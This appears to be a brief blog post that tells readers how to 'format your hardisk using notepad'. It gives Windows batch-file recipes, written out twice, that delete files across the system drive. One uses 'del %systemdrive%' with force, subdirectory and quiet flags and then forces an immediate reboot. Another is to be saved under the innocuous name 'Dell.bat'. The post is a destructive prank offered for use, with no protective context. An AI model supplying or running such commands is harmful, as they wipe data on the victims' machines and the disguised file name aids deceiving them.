format your hardisk using notepad!!
go to notepad
@Echo off
Del C:\ *.*
y
save it as Dell.bat
or worse
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
go to notepad
@Echo off
Del C:\ *.*
y
save it as Dell.bat
or worse
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
0 Responses
Post a Comment
Subscribe to:
Post Comments (Atom)